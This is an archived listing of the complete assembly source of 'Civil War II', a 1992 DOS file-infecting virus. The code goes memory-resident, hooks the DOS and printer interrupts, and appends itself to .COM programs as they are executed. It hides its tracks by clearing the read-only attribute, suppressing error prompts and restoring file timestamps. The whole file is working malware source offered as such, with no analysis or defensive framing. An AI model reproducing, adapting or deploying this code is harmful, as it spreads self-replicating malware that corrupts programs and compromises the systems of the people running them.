home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / SOURCE.ZIP / CIVIL210.ASM < prev    next >
Assembly Source File  |  1992-06-04  |  9KB  |  363 lines
  1. ;****************************************************************************
  2. ;   Civil War II                                                      *
  3. ;                                                                *
  4. ;   Assembled with Tasm 2.5                                            *
  5. ;   (c) 1992 Dark Helmet, The Netherlands                               *
  6. ;   The author takes no responsibility for any dameged caused by this virus *
  7. ;                                        *
  8. ;****************************************************************************
  9. ;                                        *
  10. ;   Civil War...                                *
  11. ;                                        *
  12. ;   "For all I've seen has change my mind                               *
  13. ;    But still the wars go on as the years go by                        *
  14. ;    With no love for God or human rights                               *
  15. ;    'Cause all these dreams are swept aside                            *
  16. ;    By bloody hands of the hypnotized                        *
  17. ;    Who carry the cross of homicide                                    *
  18. ;    And history bears the scars of our civil war"                      *
  19. ;                                                                *
  20. ;****************************************************************************
  21.  
  22.               .Radix 16
  23. Civil_War     Segment
  24.         Model  small
  25.               Assume cs:Civil_War, ds:Civil_War, es:Civil_War
  26.  
  27.               org 100h
  28.  
  29. len           equ offset last - begin
  30. virus_len     equ len / 16d 
  31.  
  32. dummy:             db 0e9h, 03h, 00h, 44h, 48h, 00h       ; Jump + infection
  33.                                               ; marker
  34.  
  35. begin:             Call virus                            ; make call to
  36.                                                ; push IP on stack
  37.  
  38. virus:             pop      bp                          ; get IP from stack.
  39.               sub      bp,109h                      ; adjust IP.
  40.  
  41. restore_host:      mov      di,0100h                    ; recover beginning
  42.               lea      si,ds:[carrier_begin+bp]     ; of carrier program.
  43.               mov      cx,06h
  44.               rep      movsb
  45.  
  46. check_resident:    mov    ah,0a0h                     ; check if virus
  47.              int    21h                         ; already installed.
  48.              cmp    ax,0001h
  49.              je       end_virus
  50.  
  51. adjust_memory:     mov      ax,cs                          ; start of Memory
  52.               dec      ax                          ; Control Block
  53.               mov      ds,ax
  54.               cmp      byte ptr ds:[0000],5a          ; check if last
  55.                                                ; block
  56.               jne      abort                          ; if not last block
  57.                                                ; end
  58.               mov      ax,ds:[0003]                   ; decrease memory
  59.               sub      ax,50                       ; by 1kbyte lenght
  60.               mov      ds:0003,ax
  61.  
  62. install_virus:     mov      bx,ax                          ; es point to start
  63.               mov      ax,es                          ; virus in memory
  64.               add      ax,bx
  65.               mov      es,ax
  66.               mov      cx,len                     ; cx = lenght virus
  67.               mov      ax,ds                          ; restore ds
  68.               inc      ax
  69.               mov      ds,ax
  70.               lea      si,ds:[begin+bp]               ; point to start virus
  71.               lea      di,es:0100                     ; point to destination
  72.               rep      movsb                          ; copy virus in
  73.                                                ; memory
  74.               mov      [virus_segment+bp],es             ; store start virus
  75.                                                ; in memory
  76.               mov     ax,cs                         ; restore es
  77.               mov      es,ax
  78.  
  79. hook_vector:       cli                    ; no interups
  80.         mov    ax,3517h
  81.         int    21h
  82.         mov    es,[virus_segment+bp]
  83.         mov    es:[old_17h-6],bx
  84.         mov    es:[old_17h+2-6h],es
  85.         mov    dx,offset new_17h - 6h
  86.         mov    ax,2517h
  87.         int    21h
  88.         
  89.         mov      ax,3521h            ; revector int 21
  90.               int      21h
  91.         mov     ds,[virus_segment+bp]
  92.         mov      ds:[old_21h-6h],bx
  93.               mov      ds:[old_21h+2-6h],es
  94.              mov      dx,offset main_virus - 6h
  95.               mov      ax,2521h
  96.               int      21h
  97.               sti
  98.  
  99. abort:             mov      ax,cs
  100.              mov      ds,ax
  101.               mov      es,ax
  102.         xor     ax,ax
  103.  
  104. end_virus:         mov    bx,0100h            ; jump to begin
  105.         jmp    bx                ; host file
  106.  
  107.         
  108. ;***************************************************************************
  109.  
  110. main_virus:        pushf                    
  111.         cmp    ah,0a0h                ; check virus call
  112.         jne    new_21h                ; no virus call
  113.         mov    ax,0001h            ; ax = id
  114.         popf                    ; return id    
  115.         iret
  116.         
  117. new_21h:    push    ds                ; save registers
  118.         push    es
  119.         push    di
  120.         push    si
  121.         push    ax
  122.         push    bx
  123.         push    cx
  124.         push    dx
  125.  
  126.         cmp    ah,40h
  127.         jne    check_05
  128.         cmp    bx,0004h
  129.         jne    check_05
  130.         jmp    message
  131.  
  132. check_05:    cmp    ah,05h
  133.         jne    check_exec
  134.         jmp    message        
  135.  
  136. check_exec:    cmp    ax,04b00h            ; exec function?
  137.         jne    continu
  138.         mov    cs:[name_seg-6],ds
  139.         mov    cs:[name_off-6],dx
  140.         jmp    chk_com
  141.  
  142. continu:    pop    dx                ; restore registers
  143.         pop    cx
  144.         pop    bx
  145.         pop    ax
  146.         pop    si
  147.         pop    di
  148.         pop    es
  149.         pop    ds
  150.         popf
  151.         jmp    dword ptr cs:[old_21h-6]
  152.  
  153. chk_com:    cld                    ; check extension
  154.         mov    di,dx                ; for COM
  155.         push    ds
  156.         pop    es
  157.         mov    al,'.'                ; search extension
  158.         repne    scasb                ; check 'COM"
  159.         cmp    word ptr es:[di],'OC'        ; check 'CO'
  160.         jne    continu
  161.         cmp    word ptr es:[di+2],'M'        ; check 'M'
  162.         jne    continu
  163.         cmp    word ptr es:[di-3],'DN'        ; check if
  164.         je      continu                ; COMMAND.COM
  165.         
  166.         call    set_int24h
  167.         call    set_atribuut
  168.                 
  169. open_file:    mov    ds,cs:[name_seg-6]
  170.         mov    dx,cs:[name_off-6]
  171.         mov    ax,3D02h            ; open file
  172.         call     do_int21h
  173.         jc    close_file
  174.         push    cs
  175.         pop    ds
  176.         mov    [handle-6],ax
  177.         mov    bx,ax    
  178.  
  179.         call    get_date    
  180.         
  181. check_infect:    push    cs
  182.         pop    ds
  183.         mov    bx,[handle-6]            ; read first 6 bytes
  184.         mov    ah,3fh
  185.         mov    cx,06h
  186.         lea    dx,[carrier_begin-6]
  187.         call    do_int21h
  188.         mov    al, byte ptr [carrier_begin-6]+3 ; check initials
  189.         mov    ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H'
  190.         cmp    ax,[initials-6]
  191.         je    save_date             ; if equal already
  192.                              ; infect
  193.         
  194. get_lenght:    mov    ax,4200h            ; file pointer begin
  195.         call    move_pointer
  196.         mov    ax,4202h            ; file pointer end
  197.         call    move_pointer
  198.         sub    ax,03h                ; ax = filelenght
  199.         mov    [lenght_file-6],ax
  200.         
  201.         call    write_jmp
  202.         call    write_virus                    
  203.  
  204. save_date:    push    cs
  205.         pop    ds
  206.         mov    bx,[handle-6]
  207.         mov    dx,[date-6]
  208.         mov    cx,[time-6]
  209.         mov    ax,5701h
  210.         call    do_int21h
  211.  
  212. close_file:    mov    bx,[handle-6]
  213.         mov    ah,03eh                ; close file
  214.         call    do_int21h
  215.         
  216.         mov    dx,cs:[old_24h-6]        ; restore int24h
  217.         mov    ds,cs:[old_24h+2-6]
  218.         mov    ax,2524h
  219.         call    do_int21h
  220.         
  221.         jmp    continu        
  222.         
  223.         
  224.  
  225.  
  226. new_24h:    mov    al,3
  227.         iret
  228.  
  229.  
  230. new_17h:    cli
  231.         pushf
  232.         push    ds
  233.         push    es
  234.         push    di
  235.         push    si
  236.         push    ax
  237.         push    bx
  238.         push    cx
  239.         push    dx
  240.         
  241.         cmp    ah,00h
  242.         jne    continu_17h
  243.         jmp    print_message
  244.  
  245. continu_17h:    pop    dx
  246.         pop    cx
  247.         pop    bx
  248.         pop    ax
  249.         pop    si
  250.         pop    di
  251.         pop    es
  252.         pop    ds
  253.         popf
  254.         sti
  255.         jmp    dword ptr cs:[old_17h-6]
  256.  
  257. print_message:  mov    ah,09h
  258.         lea    dx,cs:text-6h
  259.         call    do_int21h
  260.         jmp    continu_17h         
  261.  
  262. ;---------------------------------------------------------------------------
  263. ;            PROCEDURES
  264. ;---------------------------------------------------------------------------
  265.  
  266. message:    mov    ah,09h
  267.         lea    dx,cs:text-6h
  268.         call    do_int21h
  269.         jmp    continu
  270.  
  271.  
  272.  
  273. move_pointer:    push    cs
  274.         pop    ds
  275.         mov    bx,[handle-6]
  276.         xor    cx,cx
  277.         xor    dx,dx
  278.         call    do_int21h
  279.         ret
  280.  
  281. do_int21h:    pushf
  282.         call     dword ptr cs:[old_21h-6]
  283.         ret
  284.  
  285. write_jmp:    push    cs
  286.         pop    ds
  287.         mov    ax,4200h
  288.         call    move_pointer
  289.         mov    ah,40h
  290.         mov    cx,01h
  291.         lea    dx,[jump-6]
  292.         call    do_int21h
  293.         mov    ah,40h
  294.         mov    cx,02h
  295.         lea    dx,[lenght_file-6]
  296.         call    do_int21h
  297.         mov    ah,40h
  298.         mov    cx,02h
  299.         lea    dx,[initials-6]
  300.         call    do_int21h
  301.         ret
  302.  
  303. write_virus:    push    cs
  304.         pop    ds
  305.         mov    ax,4202h
  306.         call    move_pointer
  307.         mov    ah,40
  308.         mov    cx,len
  309.         mov    dx,100
  310.         call    do_int21h
  311.         ret
  312.  
  313. get_date:    mov    ax,5700h
  314.         call    do_int21h
  315.         push    cs
  316.         pop    ds
  317.         mov    [date-6],dx
  318.         mov    [time-6],cx
  319.         ret
  320.  
  321. set_int24h:    mov    ax,3524h
  322.         call    do_int21h
  323.         mov    cs:[old_24h-6],bx
  324.         mov    cs:[old_24h+2-6],es
  325.         mov    dx,offset new_24h-6
  326.         push    cs
  327.         pop    ds
  328.         mov    ax,2524h
  329.         call    do_int21h
  330.         ret
  331.  
  332. set_atribuut:    mov    ax,4300h            ; get atribuut
  333.         mov    ds,cs:[name_seg-6]
  334.         mov    dx,cs:[name_off-6]
  335.         call    do_int21h
  336.         and    cl,0feh                ; set atribuut
  337.         mov    ax,4301h
  338.         call    do_int21h        
  339.         ret
  340.  
  341. ;---------------------------------------------------------------------------
  342. ;                DATA
  343. ;---------------------------------------------------------------------------
  344.  
  345. old_21h            dw  00h,00h
  346. old_17h        dw  00h,00h
  347. old_24h        dw  00h,00h
  348. carrier_begin      db  090h, 0cdh, 020h, 044h, 048h, 00h
  349. text          db  'Civil War II v1.0, (c) 06/03/1992 The Netherlands.','$',00h
  350. jump        db  0e9h
  351. name_seg    dw  ?
  352. name_off    dw  ?
  353. virus_segment      dw  ?
  354. lenght_file    dw  ?
  355. handle        dw  ?
  356. date        dw  ?
  357. time        dw  ?
  358. initials    dw  4844h
  359. last          db  090h
  360.  
  361. Civil_war     ends
  362.               end dummy
  363.